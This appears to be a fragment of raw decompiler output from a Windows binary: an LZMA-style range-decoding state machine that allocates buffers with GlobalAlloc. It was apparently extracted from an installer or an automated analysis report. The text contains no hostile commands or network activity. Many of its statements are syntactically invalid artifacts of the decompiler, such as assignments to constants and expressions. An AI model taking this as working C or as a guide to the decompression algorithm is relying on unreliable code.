                                                                                      								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                      								if( *(_t613 - 0xc) >= _t565) {
                                                                                      									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                      									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                      									 *(_t613 - 0x40) = 1;
                                                                                      									_t532 = _t531 - (_t531 >> 5);
                                                                                      									 *_t606 = _t532;
                                                                                      								} else {
                                                                                      									 *(_t613 - 0x10) = _t565;
                                                                                      									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                      									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                      								}
                                                                                      								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                      									goto L139;
                                                                                      								}
                                                                                      								L137:
                                                                                      								if( *(_t613 - 0x6c) == 0) {
                                                                                      									 *(_t613 - 0x88) = 5;
                                                                                      									L170:
                                                                                      									_t568 = 0x22;
                                                                                      									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                      									_t535 = 0;
                                                                                      									L172:
                                                                                      									return _t535;
                                                                                      								}
                                                                                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                      								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                      								L139:
                                                                                      								_t533 =  *(_t613 - 0x84);
                                                                                      								while(1) {
                                                                                      									 *(_t613 - 0x88) = _t533;
                                                                                      									while(1) {
                                                                                      										L1:
                                                                                      										_t534 =  *(_t613 - 0x88);
                                                                                      										if(_t534 > 0x1c) {
                                                                                      											break;
                                                                                      										}
                                                                                      										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                                      											case 0:
                                                                                      												if( *(_t613 - 0x6c) == 0) {
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      												_t534 =  *( *(_t613 - 0x70));
                                                                                      												if(_t534 > 0xe1) {
                                                                                      													goto L171;
                                                                                      												}
                                                                                      												_t538 = _t534 & 0x000000ff;
                                                                                      												_push(0x2d);
                                                                                      												asm("cdq");
                                                                                      												_pop(_t570);
                                                                                      												_push(9);
                                                                                      												_pop(_t571);
                                                                                      												_t609 = _t538 / _t570;
                                                                                      												_t540 = _t538 % _t570 & 0x000000ff;
                                                                                      												asm("cdq");
                                                                                      												_t604 = _t540 % _t571 & 0x000000ff;
                                                                                      												 *(_t613 - 0x3c) = _t604;
                                                                                      												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                      												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                      												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                      												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                      													L10:
                                                                                      													if(_t612 == 0) {
                                                                                      														L12:
                                                                                      														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                      														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                      														goto L15;
                                                                                      													} else {
                                                                                      														goto L11;
                                                                                      													}
                                                                                      													do {
                                                                                      														L11:
                                                                                      														_t612 = _t612 - 1;
                                                                                      														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                      													} while (_t612 != 0);
                                                                                      													goto L12;
                                                                                      												}
                                                                                      												if( *(_t613 - 4) != 0) {
                                                                                      													GlobalFree( *(_t613 - 4));
                                                                                      												}
                                                                                      												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                      												 *(_t613 - 4) = _t534;
                                                                                      												if(_t534 == 0) {
                                                                                      													goto L171;
                                                                                      												} else {
                                                                                      													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                      													goto L10;
                                                                                      												}
                                                                                      											case 1:
                                                                                      												L13:
                                                                                      												__eflags =  *(_t613 - 0x6c);
                                                                                      												if( *(_t613 - 0x6c) == 0) {
                                                                                      													 *(_t613 - 0x88) = 1;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                      												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                      												_t45 = _t613 - 0x48;
                                                                                      												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                      												__eflags =  *_t45;
                                                                                      												L15:
                                                                                      												if( *(_t613 - 0x48) < 4) {
                                                                                      													goto L13;
                                                                                      												}
                                                                                      												_t546 =  *(_t613 - 0x40);
                                                                                      												if(_t546 ==  *(_t613 - 0x74)) {
                                                                                      													L20:
                                                                                      													 *(_t613 - 0x48) = 5;
                                                                                      													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                      													goto L23;
                                                                                      												}
                                                                                      												 *(_t613 - 0x74) = _t546;
                                                                                      												if( *(_t613 - 8) != 0) {
                                                                                      													GlobalFree( *(_t613 - 8));
                                                                                      												}
                                                                                      												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                      												 *(_t613 - 8) = _t534;
                                                                                      												if(_t534 == 0) {
                                                                                      													goto L171;
                                                                                      												} else {
                                                                                      													goto L20;
                                                                                      												}
                                                                                      											case 2:
                                                                                      												L24:
                                                                                      												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                                      												 *(_t613 - 0x84) = 6;
                                                                                      												 *(_t613 - 0x4c) = _t553;
                                                                                      												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                                      												L132:
                                                                                      												 *(_t613 - 0x54) = _t606;
                                                                                      												goto L133;
                                                                                      											case 3:
                                                                                      												L21:
                                                                                      												__eflags =  *(_t613 - 0x6c);
                                                                                      												if( *(_t613 - 0x6c) == 0) {
                                                                                      													 *(_t613 - 0x88) = 3;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                      												_t67 = _t613 - 0x70;
                                                                                      												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                                      												__eflags =  *_t67;
                                                                                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                      												L23:
                                                                                      												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                                      												if( *(_t613 - 0x48) != 0) {
                                                                                      													goto L21;
                                                                                      												}
                                                                                      												goto L24;
                                                                                      											case 4:
                                                                                      												L133:
                                                                                      												_t531 =  *_t606;
                                                                                      												_t589 = _t531 & 0x0000ffff;
                                                                                      												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                      												if( *(_t613 - 0xc) >= _t565) {
                                                                                      													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                      													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                      													 *(_t613 - 0x40) = 1;
                                                                                      													_t532 = _t531 - (_t531 >> 5);
                                                                                      													 *_t606 = _t532;
                                                                                      												} else {
                                                                                      													 *(_t613 - 0x10) = _t565;
                                                                                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                      													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                      												}
                                                                                      												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                      													goto L139;
                                                                                      												}
                                                                                      											case 5:
                                                                                      												goto L137;
                                                                                      											case 6:
                                                                                      												__edx = 0;
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__eax =  *(__ebp - 4);
                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                      													 *(__ebp - 0x34) = 1;
                                                                                      													 *(__ebp - 0x84) = 7;
                                                                                      													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                      													while(1) {
                                                                                      														L132:
                                                                                      														 *(_t613 - 0x54) = _t606;
                                                                                      														goto L133;
                                                                                      													}
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                      												__esi =  *(__ebp - 0x60);
                                                                                      												__cl = 8;
                                                                                      												__cl = 8 -  *(__ebp - 0x3c);
                                                                                      												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                      												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                      												__ecx =  *(__ebp - 0x3c);
                                                                                      												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                      												__ecx =  *(__ebp - 4);
                                                                                      												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                      												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                      												__eflags =  *(__ebp - 0x38) - 4;
                                                                                      												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                      												if( *(__ebp - 0x38) >= 4) {
                                                                                      													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                      													if( *(__ebp - 0x38) >= 0xa) {
                                                                                      														_t98 = __ebp - 0x38;
                                                                                      														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                      														__eflags =  *_t98;
                                                                                      													} else {
                                                                                      														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                      													}
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x38) = 0;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                      												if( *(__ebp - 0x34) == __edx) {
                                                                                      													__ebx = 0;
                                                                                      													__ebx = 1;
                                                                                      													goto L61;
                                                                                      												} else {
                                                                                      													__eax =  *(__ebp - 0x14);
                                                                                      													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      													__eflags = __eax -  *(__ebp - 0x74);
                                                                                      													if(__eax >=  *(__ebp - 0x74)) {
                                                                                      														__eax = __eax +  *(__ebp - 0x74);
                                                                                      														__eflags = __eax;
                                                                                      													}
                                                                                      													__ecx =  *(__ebp - 8);
                                                                                      													__ebx = 0;
                                                                                      													__ebx = 1;
                                                                                      													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                      													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                      													goto L41;
                                                                                      												}
                                                                                      											case 7:
                                                                                      												__eflags =  *(__ebp - 0x40) - 1;
                                                                                      												if( *(__ebp - 0x40) != 1) {
                                                                                      													__eax =  *(__ebp - 0x24);
                                                                                      													 *(__ebp - 0x80) = 0x16;
                                                                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      													__eax =  *(__ebp - 0x28);
                                                                                      													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      													__eax =  *(__ebp - 0x2c);
                                                                                      													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      													__eax = 0;
                                                                                      													__eflags =  *(__ebp - 0x38) - 7;
                                                                                      													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      													__al = __al & 0x000000fd;
                                                                                      													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                      													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                      													__eax =  *(__ebp - 4);
                                                                                      													__eax =  *(__ebp - 4) + 0x664;
                                                                                      													__eflags = __eax;
                                                                                      													 *(__ebp - 0x58) = __eax;
                                                                                      													goto L69;
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 4);
                                                                                      												__ecx =  *(__ebp - 0x38);
                                                                                      												 *(__ebp - 0x84) = 8;
                                                                                      												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                      												while(1) {
                                                                                      													L132:
                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                      													goto L133;
                                                                                      												}
                                                                                      											case 8:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__eax =  *(__ebp - 4);
                                                                                      													__ecx =  *(__ebp - 0x38);
                                                                                      													 *(__ebp - 0x84) = 0xa;
                                                                                      													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                      												} else {
                                                                                      													__eax =  *(__ebp - 0x38);
                                                                                      													__ecx =  *(__ebp - 4);
                                                                                      													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                      													 *(__ebp - 0x84) = 9;
                                                                                      													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                      													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                      												}
                                                                                      												while(1) {
                                                                                      													L132:
                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                      													goto L133;
                                                                                      												}
                                                                                      											case 9:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													goto L89;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x60);
                                                                                      												if( *(__ebp - 0x60) == 0) {
                                                                                      													goto L171;
                                                                                      												}
                                                                                      												__eax = 0;
                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                      												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                      												__eflags = _t259;
                                                                                      												0 | _t259 = _t259 + _t259 + 9;
                                                                                      												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                      												goto L76;
                                                                                      											case 0xa:
                                                                                      												goto L0;
                                                                                      											case 0xb:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__ecx =  *(__ebp - 0x24);
                                                                                      													__eax =  *(__ebp - 0x20);
                                                                                      													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      												} else {
                                                                                      													__eax =  *(__ebp - 0x24);
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x28);
                                                                                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      												goto L88;
                                                                                      											case 0xc:
                                                                                      												L99:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0xc;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t334 = __ebp - 0x70;
                                                                                      												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t334;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                      												goto L101;
                                                                                      											case 0xd:
                                                                                      												L37:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0xd;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t122 = __ebp - 0x70;
                                                                                      												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t122;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												L39:
                                                                                      												__eax =  *(__ebp - 0x40);
                                                                                      												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                      													goto L48;
                                                                                      												}
                                                                                      												__eflags = __ebx - 0x100;
                                                                                      												if(__ebx >= 0x100) {
                                                                                      													goto L54;
                                                                                      												}
                                                                                      												L41:
                                                                                      												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                      												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                      												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                      												 *(__ebp - 0x48) = __eax;
                                                                                      												__eax = __eax + 1;
                                                                                      												__eax = __eax << 8;
                                                                                      												__eax = __eax + __ebx;
                                                                                      												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      												__ax =  *__esi;
                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                      												__edx = __ax & 0x0000ffff;
                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      													__cx = __ax;
                                                                                      													 *(__ebp - 0x40) = 1;
                                                                                      													__cx = __ax >> 5;
                                                                                      													__eflags = __eax;
                                                                                      													__ebx = __ebx + __ebx + 1;
                                                                                      													 *__esi = __ax;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                      													0x800 = 0x800 - __edx;
                                                                                      													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                      													__ebx = __ebx + __ebx;
                                                                                      													 *__esi = __cx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													goto L39;
                                                                                      												} else {
                                                                                      													goto L37;
                                                                                      												}
                                                                                      											case 0xe:
                                                                                      												L46:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0xe;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t156 = __ebp - 0x70;
                                                                                      												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t156;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												while(1) {
                                                                                      													L48:
                                                                                      													__eflags = __ebx - 0x100;
                                                                                      													if(__ebx >= 0x100) {
                                                                                      														break;
                                                                                      													}
                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                      													__edx = __ebx + __ebx;
                                                                                      													__ecx =  *(__ebp - 0x10);
                                                                                      													__esi = __edx + __eax;
                                                                                      													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      													__ax =  *__esi;
                                                                                      													 *(__ebp - 0x54) = __esi;
                                                                                      													__edi = __ax & 0x0000ffff;
                                                                                      													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      													if( *(__ebp - 0xc) >= __ecx) {
                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      														__cx = __ax;
                                                                                      														_t170 = __edx + 1; // 0x1
                                                                                      														__ebx = _t170;
                                                                                      														__cx = __ax >> 5;
                                                                                      														__eflags = __eax;
                                                                                      														 *__esi = __ax;
                                                                                      													} else {
                                                                                      														 *(__ebp - 0x10) = __ecx;
                                                                                      														0x800 = 0x800 - __edi;
                                                                                      														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      														__ebx = __ebx + __ebx;
                                                                                      														 *__esi = __cx;
                                                                                      													}
                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      														continue;
                                                                                      													} else {
                                                                                      														goto L46;
                                                                                      													}
                                                                                      												}
                                                                                      												L54:
                                                                                      												_t173 = __ebp - 0x34;
                                                                                      												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                      												__eflags =  *_t173;
                                                                                      												goto L55;
                                                                                      											case 0xf:
                                                                                      												L58:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0xf;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t203 = __ebp - 0x70;
                                                                                      												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t203;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												L60:
                                                                                      												__eflags = __ebx - 0x100;
                                                                                      												if(__ebx >= 0x100) {
                                                                                      													L55:
                                                                                      													__al =  *(__ebp - 0x44);
                                                                                      													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                      													goto L56;
                                                                                      												}
                                                                                      												L61:
                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                      												__edx = __ebx + __ebx;
                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                      												__esi = __edx + __eax;
                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      												__ax =  *__esi;
                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      													__cx = __ax;
                                                                                      													_t217 = __edx + 1; // 0x1
                                                                                      													__ebx = _t217;
                                                                                      													__cx = __ax >> 5;
                                                                                      													__eflags = __eax;
                                                                                      													 *__esi = __ax;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                      													0x800 = 0x800 - __edi;
                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      													__ebx = __ebx + __ebx;
                                                                                      													 *__esi = __cx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													goto L60;
                                                                                      												} else {
                                                                                      													goto L58;
                                                                                      												}
                                                                                      											case 0x10:
                                                                                      												L109:
                                                                                      												__eflags =  *(__ebp - 0x6c);
                                                                                      												if( *(__ebp - 0x6c) == 0) {
                                                                                      													 *(__ebp - 0x88) = 0x10;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0x70);
                                                                                      												__eax =  *(__ebp - 0xc);
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												_t365 = __ebp - 0x70;
                                                                                      												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                      												__eflags =  *_t365;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      												goto L111;
                                                                                      											case 0x11:
                                                                                      												goto L69;
                                                                                      											case 0x12:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                      													 *(__ebp - 0x84) = 0x13;
                                                                                      													__esi =  *(__ebp - 0x58) + 2;
                                                                                      													while(1) {
                                                                                      														L132:
                                                                                      														 *(_t613 - 0x54) = _t606;
                                                                                      														goto L133;
                                                                                      													}
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x4c);
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                                      												__eflags = __eax;
                                                                                      												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                      												goto L130;
                                                                                      											case 0x13:
                                                                                      												__eflags =  *(__ebp - 0x40);
                                                                                      												if( *(__ebp - 0x40) != 0) {
                                                                                      													_t469 = __ebp - 0x58;
                                                                                      													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                      													__eflags =  *_t469;
                                                                                      													 *(__ebp - 0x30) = 0x10;
                                                                                      													 *(__ebp - 0x40) = 8;
                                                                                      													L144:
                                                                                      													 *(__ebp - 0x7c) = 0x14;
                                                                                      													goto L145;
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x4c);
                                                                                      												__ecx =  *(__ebp - 0x58);
                                                                                      												__eax =  *(__ebp - 0x4c) << 4;
                                                                                      												 *(__ebp - 0x30) = 8;
                                                                                      												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                      												L130:
                                                                                      												 *(__ebp - 0x58) = __eax;
                                                                                      												 *(__ebp - 0x40) = 3;
                                                                                      												goto L144;
                                                                                      											case 0x14:
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                      												__eax =  *(__ebp - 0x80);
                                                                                      												 *(_t613 - 0x88) = _t533;
                                                                                      												goto L1;
                                                                                      											case 0x15:
                                                                                      												__eax = 0;
                                                                                      												__eflags =  *(__ebp - 0x38) - 7;
                                                                                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      												__al = __al & 0x000000fd;
